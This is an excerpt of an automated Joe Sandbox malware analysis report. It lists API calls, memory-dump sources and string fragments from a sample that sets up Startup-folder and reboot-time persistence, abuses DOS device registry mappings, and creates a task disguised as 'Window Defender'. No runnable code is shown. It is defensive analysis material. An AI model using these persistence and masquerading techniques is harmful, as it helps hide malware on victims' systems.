                                          • RegCloseKey.ADVAPI32(?), ref: 100011C0
                                          • _memset.LIBCMT ref: 100012B7
                                          • RegCloseKey.ADVAPI32(?), ref: 100012EE
                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 100012FF
                                          • _memset.LIBCMT ref: 10001318
                                          • _sprintf.LIBCMT ref: 100013C3
                                          • _memset.LIBCMT ref: 10001471
                                          • RegCreateKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 10001496
                                          • _sprintf.LIBCMT ref: 100014B7
                                          • RegSetValueExA.ADVAPI32(?,1001962C,00000000,00000001,?,?), ref: 100014E8
                                          • _sprintf.LIBCMT ref: 10001509
                                          • DefineDosDeviceA.KERNEL32(00000001,1001962C,?), ref: 1000151B
                                          • _memset.LIBCMT ref: 1000154C
                                          • _sprintf.LIBCMT ref: 10001566
                                          • _memset.LIBCMT ref: 100015A7
                                          • _memset.LIBCMT ref: 100015BE
                                          • _memset.LIBCMT ref: 10001619
                                          • _memset.LIBCMT ref: 1000162D
                                          • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000165A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: _memset$_sprintf$CloseValue$CreateDefineDeviceFileFolderMovePathSpecial_wprintf
                                          • String ID: %s\1.qwq1$%s\Mic$.qwq$1$QWQ\ShellEx\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}$SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices$[:\1.qwq1$art Me$grams$nu\Pro$ows\St$rosoft\Wind
                                          • API String ID: 1177859221-1427731300
                                          • Opcode ID: dd203d5e68e146d2d8d35a072c78427b362adfbb93d1c2cfe64de85bad0544cb
                                          • Instruction ID: 5e77c6fea4325d479937a6c85de82ae530236ccce02044bcbca6b124a08d5227
                                          • Opcode Fuzzy Hash: dd203d5e68e146d2d8d35a072c78427b362adfbb93d1c2cfe64de85bad0544cb
                                          • Instruction Fuzzy Hash: 1BD17AB184126DAEEB22DF548C84FEAB7BDFB04380F4045E5E649AB105DB709F858F61
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: _memset$_sprintf$DefineDeviceFileMoveValue
                                          • String ID: %s\1.qwq1$.qwq$1$[:\S$tart$up\1
                                          • API String ID: 3652080668-2429600194
                                          • Opcode ID: 2722c036afaf77bf298d045a55e73282290402bd08fd007bf2cfaf8c4f92b27b
                                          • Instruction ID: a964a3bc9486c9eff3c95fdf3f76b4f48b68aa9d2ef2ac676079097a5238c2e0
                                          • Opcode Fuzzy Hash: 2722c036afaf77bf298d045a55e73282290402bd08fd007bf2cfaf8c4f92b27b
                                          • Instruction Fuzzy Hash: 4C418FB1A5122DAEEF11DF649C44BEA77FCAF48244F0055E5D24DE7101D6309F888FA1
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 04292396
                                          • CoInitializeEx.COMBASE(00000000,00000000), ref: 0429239F
                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 042923B1
                                          • CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 042923CB
                                          • VariantInit.OLEAUT32(?), ref: 042923D8
                                          • VariantInit.OLEAUT32(?), ref: 042923F8
                                          • VariantInit.OLEAUT32(?), ref: 04292415
                                          • VariantInit.OLEAUT32(?), ref: 04292432
                                            • Part of subcall function 042916CE: __EH_prolog3.LIBCMT ref: 042916D5
                                            • Part of subcall function 042916CE: SysAllocString.OLEAUT32(?), ref: 042916FD
                                          • _memset.LIBCMT ref: 042926A2
                                          • _memset.LIBCMT ref: 042926D5
                                          • _mbstowcs.LIBCMT ref: 042926ED
                                          • VariantInit.OLEAUT32(?), ref: 042927B2
                                          • VariantInit.OLEAUT32(?), ref: 042927CF
                                          • CoUninitialize.COMBASE ref: 0429287F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: InitVariant$Initialize_memset$AllocCreateH_prolog3H_prolog3_InstanceSecurityStringUninitialize_mbstowcs
                                          • String ID: Window Defender UqdataMicrosoft Corporation$atio$n
                                          • API String ID: 2940185448-2587304410
                                          • Opcode ID: 7895a36a98caa6a1b9973c65e0fbdfbb4afb65271a52eed45e1ff492932daf53
                                          • Instruction ID: 5f492419dde9336103f14833f19ff03aa07a7e60dc6bfdda0ee6009570f297bc
                                          • Opcode Fuzzy Hash: 7895a36a98caa6a1b9973c65e0fbdfbb4afb65271a52eed45e1ff492932daf53
                                          • Instruction Fuzzy Hash: 6FF11771A10629AFDF22DF64CC84AAEB7BDAF45304F0085D5E909AB250C771AF86CF50
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 10002392
                                          • CoInitializeEx.COMBASE(00000000,00000000), ref: 1000239B
                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 100023AD
                                          • CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 100023C7
                                          • VariantInit.OLEAUT32(?), ref: 100023D4
                                          • VariantInit.OLEAUT32(?), ref: 100023F4
                                          • VariantInit.OLEAUT32(?), ref: 10002411
                                          • VariantInit.OLEAUT32(?), ref: 1000242E
                                            • Part of subcall function 100016CA: __EH_prolog3.LIBCMT ref: 100016D1
                                            • Part of subcall function 100016CA: SysAllocString.OLEAUT32(?), ref: 100016F9
                                          • _memset.LIBCMT ref: 1000269E
                                          • _memset.LIBCMT ref: 100026D1
                                          • _mbstowcs.LIBCMT ref: 100026E9
                                          • VariantInit.OLEAUT32(?), ref: 100027AE
                                          • VariantInit.OLEAUT32(?), ref: 100027CB
                                            • Part of subcall function 1000172A: InterlockedDecrement.KERNEL32(?), ref: 10001735
                                            • Part of subcall function 1000172A: SysFreeString.OLEAUT32(00000000), ref: 1000174A
                                          • CoUninitialize.COMBASE ref: 1000287B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: InitVariant$InitializeString_memset$AllocCreateDecrementFreeH_prolog3H_prolog3_InstanceInterlockedSecurityUninitialize_mbstowcs
                                          • String ID: Window Defender UqdataMicrosoft Corporation$atio$n
                                          • API String ID: 409417733-2587304410
                                          • Opcode ID: 1bcf64d90fbd1cfe5ab6caf9c032670dc548f2cf978397468f022cb24031ec91
                                          • Instruction ID: 72b668da65d98a1bb4e32f39a60bc430f8e3b8a7c7e261b5aafb9a33d3e2515c
                                          • Opcode Fuzzy Hash: 1bcf64d90fbd1cfe5ab6caf9c032670dc548f2cf978397468f022cb24031ec91
                                          • Instruction Fuzzy Hash: 90F10671900629AFDB12DF64CC84A9EB7BDEF45304F0085D5E909AB254D671AF8A8F90
                                          APIs
                                          • __fassign.LIBCMT ref: 04298B79
                                          • _memset.LIBCMT ref: 04298BAD
                                          • _memset.LIBCMT ref: 04298BD1
                                          • _strcat_s.LIBCMT ref: 04298BEC
                                          • _sprintf.LIBCMT ref: 04298C6D
                                          • _sprintf.LIBCMT ref: 04298C95
                                          • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 04298CCB
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 04298D54
                                          • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 04298DA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 04298DAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                          • String ID: %s%s$:$\$text.e
                                          • API String ID: 3001508280-2720340845
                                          • Opcode ID: f4a56289870efe9949b7a71bcc4694e6ac4cf3ab3c97a2aa9d2ec6e6fb0b7cd4
                                          • Instruction ID: 7dc1987e12c8ec3f14ff5b6b808b40a91d6fe610f5b4d9c3d6cf993e28c8ac63
                                          • Opcode Fuzzy Hash: f4a56289870efe9949b7a71bcc4694e6ac4cf3ab3c97a2aa9d2ec6e6fb0b7cd4
                                          • Instruction Fuzzy Hash: 899186B1A206199BEF35EA24CC84BEAB7F8AF0A355F0801D6E518A7140D7707EC5CF91
                                          APIs
                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 04292C4B
                                          • _memset.LIBCMT ref: 04292C74
                                          • Sleep.KERNEL32(00000001), ref: 04292C94
                                          • _malloc.LIBCMT ref: 04292CCE
                                          • _memset.LIBCMT ref: 04292CFB
                                          • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 04292D13
                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04292D42
                                          • FlushFileBuffers.KERNEL32(?), ref: 04292D4E
                                          • CloseHandle.KERNEL32(?), ref: 04292D5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_malloc
                                          • String ID: cef.dll$lib
                                          • API String ID: 784045994-1944707463
                                          • Opcode ID: 78c3809f02e4b57ed593cd3b1a4fced05d1416ce31e4a145e54d53faa019e399
                                          • Instruction ID: 52cb6008658b8b72823cb886a9341bdea0614ef5ae18aa91fa9f6466c8684ce8
                                          • Opcode Fuzzy Hash: 78c3809f02e4b57ed593cd3b1a4fced05d1416ce31e4a145e54d53faa019e399
                                          • Instruction Fuzzy Hash: 70319371A0022CAFEF259F648C84BE9B7B9FF59314F0044D5E688A6190D6B1AEC59F60
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 10002E24
                                          • CoInitialize.OLE32(00000000), ref: 10002E2B
                                          • CoCreateInstance.COMBASE(1001BAA4,00000000,00000001,1001BA94,?), ref: 10002E4D
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 10002F0B
                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10002F1E
                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10002F2D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ArraySafe$Bound$AccessCreateDataInitInitializeInstanceVariant
                                          • String ID:
                                          • API String ID: 1776067534-0
                                          • Opcode ID: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
                                          • Instruction ID: 22d648866f7fc07f360164d737246109097e3e6bd3236689373f1f3363e173f2
                                          • Opcode Fuzzy Hash: 79661aefa36f05e11d082444c745240cc05e8509a7cb606758af6a29bcda15af
                                          • Instruction Fuzzy Hash: CB513D35A0061AAFEB01DFA4CC88AAEBBB9FF05784F104469FE05EB214D771D9058B50
                                          APIs
                                          • lstrlen.KERNEL32(10002554,1001F0B0,?,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000A2B7
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,100016A6,?,00000004,10002554,?), ref: 1000A2CD
                                          • GetLastError.KERNEL32(?,100016A6,?,00000004,10002554,?), ref: 1000A2DC
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000A36B
                                          • _free.LIBCMT ref: 1000A37E
                                          • GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000A386
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000A3A1
                                          • _free.LIBCMT ref: 1000A3B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide_free$AllocStringlstrlen
                                          • String ID:
                                          • API String ID: 2233872252-0
                                          • Opcode ID: f327275d7ee9ba27244d37565c5e2fe9b4169d76855805d4d3bda9eb47e150af
                                          • Instruction ID: 92e8be5aa1b14d7476cacc8489220ecb3b4d7d492cf033020fc8328679f134fd
                                          • Opcode Fuzzy Hash: f327275d7ee9ba27244d37565c5e2fe9b4169d76855805d4d3bda9eb47e150af
                                          • Instruction Fuzzy Hash: 7841C172D00755ABF710DF688C45B9F7BB8FB0A7E0F114239F905A7285D734AA8086A1
                                          APIs
                                          • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 04298999
                                          • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 042989AD
                                          • __fassign.LIBCMT ref: 04298960
                                            • Part of subcall function 0429B61F: __mbsnbcpy_l.LIBCMT ref: 0429B62F
                                          • __fassign.LIBCMT ref: 04298A18
                                          • __fassign.LIBCMT ref: 04298A47
                                          • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 04298A5A
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 04298A6E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                          • String ID:
                                          • API String ID: 2854908881-0
                                          • Opcode ID: 16ce0dfbe031d256b1b38220d2be9da1467ea29f141c0d8b293b51d1b3768674
                                          • Instruction ID: 5fde35bda03b92c87c127dce0cd8ad19b9bf92eff2236ff6811161e0062184a1
                                          • Opcode Fuzzy Hash: 16ce0dfbe031d256b1b38220d2be9da1467ea29f141c0d8b293b51d1b3768674
                                          • Instruction Fuzzy Hash: C9411D71A202499AEF10EF68DC88BE977EC9F06304F5801E9D998D3281D770AE48CB55
                                          APIs
                                          • GetModuleHandleW.KERNEL32(100179E4,?,0429BA97,1001C1E0,00000008,0429BC2B,?,?,?,1001C200,0000000C,0429BCE6,?), ref: 0429E38C
                                          • __mtterm.LIBCMT ref: 0429E398
                                            • Part of subcall function 0429E063: RtlDecodePointer.NTDLL(1001F9BC), ref: 0429E074
                                            • Part of subcall function 0429E063: TlsFree.KERNEL32(1001F9C0,0429BB5A,0429BB40,1001C1E0,00000008,0429BC2B,?,?,?,1001C200,0000000C,0429BCE6,?), ref: 0429E08E
                                          • TlsAlloc.KERNEL32(?,?,0429BA97,1001C1E0,00000008,0429BC2B,?,?,?,1001C200,0000000C,0429BCE6,?), ref: 0429E425
                                          • __init_pointers.LIBCMT ref: 0429E44A
                                          • __calloc_crt.LIBCMT ref: 0429E4B8
                                          • GetCurrentThreadId.KERNEL32 ref: 0429E4E4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm
                                          • String ID:
                                          • API String ID: 3766280069-0
                                          • Opcode ID: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
                                          • Instruction ID: a8d6e77377757a222e945e6c882b826fa81c68db09c8faf445806ece91b7f719
                                          • Opcode Fuzzy Hash: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
                                          • Instruction Fuzzy Hash: F1313D31A10731AEEB11EF758C886173EE6FB45760B21462AF845D72A1EB34E842CF91
                                          APIs
                                          • GetModuleHandleW.KERNEL32(100179E4,?,1000BA93,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E388
                                          • __mtterm.LIBCMT ref: 1000E394
                                            • Part of subcall function 1000E05F: RtlDecodePointer.NTDLL(1001F9BC), ref: 1000E070
                                            • Part of subcall function 1000E05F: TlsFree.KERNEL32(1001F9C0,1000BB56,1000BB3C,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E08A
                                            • Part of subcall function 1000E05F: _free.LIBCMT ref: 1000EE82
                                          • TlsAlloc.KERNEL32(?,?,1000BA93,1001C1E0,00000008,1000BC27,?,?,?,1001C200,0000000C,1000BCE2,?), ref: 1000E421
                                          • __init_pointers.LIBCMT ref: 1000E446
                                          • __calloc_crt.LIBCMT ref: 1000E4B4
                                          • GetCurrentThreadId.KERNEL32 ref: 1000E4E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                          • String ID:
                                          • API String ID: 347030822-0
                                          • Opcode ID: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
                                          • Instruction ID: dfa6302f412d44b18f04af5178cbb3b887102783623a010561f8bc2fa93634a2
                                          • Opcode Fuzzy Hash: b6725d1cd35467420b6608e676233de06a43223fb4c5a97b29a7dd0eac56a02d
                                          • Instruction Fuzzy Hash: BC315E31901BB1AFF751DF748C8861B3EA2FB443A0B20462AF844E7276DB749842CF50
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 04299832
                                          • wsprintfA.USER32 ref: 042998C1
                                          • wsprintfA.USER32 ref: 04299BE4
                                            • Part of subcall function 04298356: __fassign.LIBCMT ref: 04298369
                                          • _wprintf.LIBCMT ref: 04299960
                                          • std::_Xinvalid_argument.LIBCPMT ref: 04299BC0
                                          • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 04299BFA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                          • String ID:
                                          • API String ID: 2279894289-0
                                          • Opcode ID: 7dd8b7e9ad2e1e9d9e634c7a49fa1b03d56ec5a7a63cc935a26c00e635a16abe
                                          • Instruction ID: 6a9b0abcdff742a6644a992e1edccf5dec697e5a3e790a5240e27d69bd1f5314
                                          • Opcode Fuzzy Hash: 7dd8b7e9ad2e1e9d9e634c7a49fa1b03d56ec5a7a63cc935a26c00e635a16abe
                                          • Instruction Fuzzy Hash: A3C128B1E212699BDF22DFA4C890BDDB7F8AF09314F5444ADE809A7241DB316E85CF50
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 04291054
                                          • CoCreateInstance.COMBASE(10017278,00000000,00000001,10017268,?), ref: 04291076
                                          • lstrlen.KERNEL32 ref: 042910AF
                                          • _memset.LIBCMT ref: 042910E4
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 04291103
                                          • CoUninitialize.COMBASE ref: 04291135
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide_memsetlstrlen
                                          • String ID:
                                          • API String ID: 2586284713-0
                                          • Opcode ID: 0439dd65e13f52771752c10942c6dff05d4d537cd571eff573b15698fac21795
                                          • Instruction ID: 0f5aeefb13868b67bbed33620022dbf233049824a9af0598049f2b962dc92b55
                                          • Opcode Fuzzy Hash: 0439dd65e13f52771752c10942c6dff05d4d537cd571eff573b15698fac21795
                                          • Instruction Fuzzy Hash: 6331E7B4A40228AFDB20DBA5CC8CAEA77B8FF59700F104598F519D7251DA70AE81CF61
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 10001050
                                          • CoCreateInstance.COMBASE(10017278,00000000,00000001,10017268,?), ref: 10001072
                                          • lstrlen.KERNEL32 ref: 100010AB
                                          • _memset.LIBCMT ref: 100010E0
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 100010FF
                                          • CoUninitialize.COMBASE ref: 10001131
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide_memsetlstrlen
                                          • String ID:
                                          • API String ID: 2586284713-0
                                          • Opcode ID: 0439dd65e13f52771752c10942c6dff05d4d537cd571eff573b15698fac21795
                                          • Instruction ID: ac1339e8a26476a343ece4beee8e0933947ee5251eb98b3c0bf2324ef1832f68
                                          • Opcode Fuzzy Hash: 0439dd65e13f52771752c10942c6dff05d4d537cd571eff573b15698fac21795
                                          • Instruction Fuzzy Hash: E631F6B4A80228AFDB10DBA4CC8CEEA77B9FF59700F104598F519DB251DA719A81CF61
                                          APIs
                                          • __getptd.LIBCMT ref: 1000D82B
                                            • Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
                                            • Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9
                                          • __amsg_exit.LIBCMT ref: 1000D84B
                                          • __lock.LIBCMT ref: 1000D85B
                                          • InterlockedDecrement.KERNEL32(?), ref: 1000D878
                                          • _free.LIBCMT ref: 1000D88B
                                          • InterlockedIncrement.KERNEL32(1001F670), ref: 1000D8A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                          • String ID:
                                          • API String ID: 3470314060-0
                                          • Opcode ID: 8dc76273e3b943d23cf5b7c912b774a5a5bc82802a68655e1fc91e2cb08c822f
                                          • Instruction ID: 739c6336b113b250371589eb23bd778b8bf39228b591d0d5a0a8eef1b7f89c6c
                                          • Opcode Fuzzy Hash: 8dc76273e3b943d23cf5b7c912b774a5a5bc82802a68655e1fc91e2cb08c822f
                                          • Instruction Fuzzy Hash: F3016135904B22EBFB01FB649889B6D77A0FB007D0F15811AE444A7199CB34ED81CBA1
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 04292FA0
                                          • CLRCreateInstance.MSCOREE(10019868,10019858,?), ref: 04292FBA
                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 042930BE
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 042930ED
                                          • SysAllocString.OLEAUT32(?), ref: 0429319F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
                                          • String ID:
                                          • API String ID: 3666180938-0
                                          • Opcode ID: d16ef4301ba3be405cc17b9ae037d6b8f6e3abc978365242e36abdc72a83fd9f
                                          • Instruction ID: 249e064f8523d8c175d37c5769addd27165adb933c8b0dc4ac768297810c7733
                                          • Opcode Fuzzy Hash: d16ef4301ba3be405cc17b9ae037d6b8f6e3abc978365242e36abdc72a83fd9f
                                          • Instruction Fuzzy Hash: 16A12771A1024AAFDF00DFE8CC889AEBBB9FF49304F644569E605EB251DB35AD45CB10
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 10002F9C
                                          • CLRCreateInstance.MSCOREE(10019868,10019858,?), ref: 10002FB6
                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 100030BA
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 100030E9
                                          • SysAllocString.OLEAUT32(?), ref: 1000319B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ArrayDataSafe$AccessAllocCreateH_prolog3InstanceStringUnaccess
                                          • String ID:
                                          • API String ID: 3666180938-0
                                          • Opcode ID: 44eb9ee277fd45cbe9789f601392d5aef2c6ce648ac6e213b405d3a886132e71
                                          • Instruction ID: 057d9618c9b2eace4bdb604887b9081d3f24a166150124c3c6b43a88f9cf3334
                                          • Opcode Fuzzy Hash: 44eb9ee277fd45cbe9789f601392d5aef2c6ce648ac6e213b405d3a886132e71
                                          • Instruction Fuzzy Hash: F1A13871A00249EFEB01CFE4CC989AEBBB9FF49344F608469E605EB251C7359E46CB10
                                          APIs
                                            • Part of subcall function 0429A263: _malloc.LIBCMT ref: 0429B4E6
                                          • _memset.LIBCMT ref: 04292B19
                                          • CreateFileA.KERNEL32(?,C0000000,00000001,?,00000004,00000001), ref: 04292BC3
                                          • WriteFile.KERNEL32(00000000,?,?,?,?,?,00000004,00000001), ref: 04292BEA
                                          • FlushFileBuffers.KERNEL32(00000005,?,?,00000004,00000001), ref: 04292BF6
                                          • CloseHandle.KERNEL32(00000005,?,?,00000004,00000001), ref: 04292C02
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: File$BuffersCloseCreateFlushHandleWrite_malloc_memset
                                          • String ID:
                                          • API String ID: 3870520013-0
                                          • Opcode ID: 61de53dc5b196caa3027edfa587beff663779e0c607d09a773be95f4cd1b64fe
                                          • Instruction ID: ecd642e7c02e7528001ab05e8a0e497279588bb36d31dd96faa549412eafcfca
                                          • Opcode Fuzzy Hash: 61de53dc5b196caa3027edfa587beff663779e0c607d09a773be95f4cd1b64fe
                                          • Instruction Fuzzy Hash: 7531A472A10128FEDF266F60CC899ED7AF9FB09355F00C4E9E50961160DB325F929FA0
                                          APIs
                                          • _malloc.LIBCMT ref: 100137B4
                                            • Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
                                            • Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
                                            • Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0
                                          • _free.LIBCMT ref: 100137C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free_malloc
                                          • String ID:
                                          • API String ID: 1020059152-0
                                          • Opcode ID: 962c0645284c0189794ec4e439591f60a48f420d20f40ccfe0a197a9b264536f
                                          • Instruction ID: 73445425a774ab1d1a036c9d07cd9d8bb7fb446bc64d92f65309e6ad6f59e006
                                          • Opcode Fuzzy Hash: 962c0645284c0189794ec4e439591f60a48f420d20f40ccfe0a197a9b264536f
